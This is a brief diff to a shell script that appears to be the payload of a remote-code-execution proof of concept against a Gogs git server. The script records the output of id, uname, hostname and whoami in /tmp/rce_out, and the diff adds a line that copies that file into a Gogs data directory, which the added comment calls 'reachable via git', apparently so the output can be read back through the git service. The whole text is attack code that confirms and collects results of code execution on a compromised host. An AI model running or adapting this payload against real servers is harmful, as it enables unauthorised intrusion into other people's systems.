|
|
@@ -1,5 +1,7 @@
|
|
|
#!/bin/sh
|
|
|
id > /tmp/rce_out 2>&1
|
|
|
-uname -a >> /tmp/rce_out 2>&1
|
|
|
+uname -a >> /tmp/rce_out 2>&1
|
|
|
hostname >> /tmp/rce_out 2>&1
|
|
|
whoami >> /tmp/rce_out 2>&1
|
|
|
+# Also write to a path reachable via git
|
|
|
+cp /tmp/rce_out /data/gogs/data/tmp/local-r/27/rce_proof.txt 2>/dev/null || true
|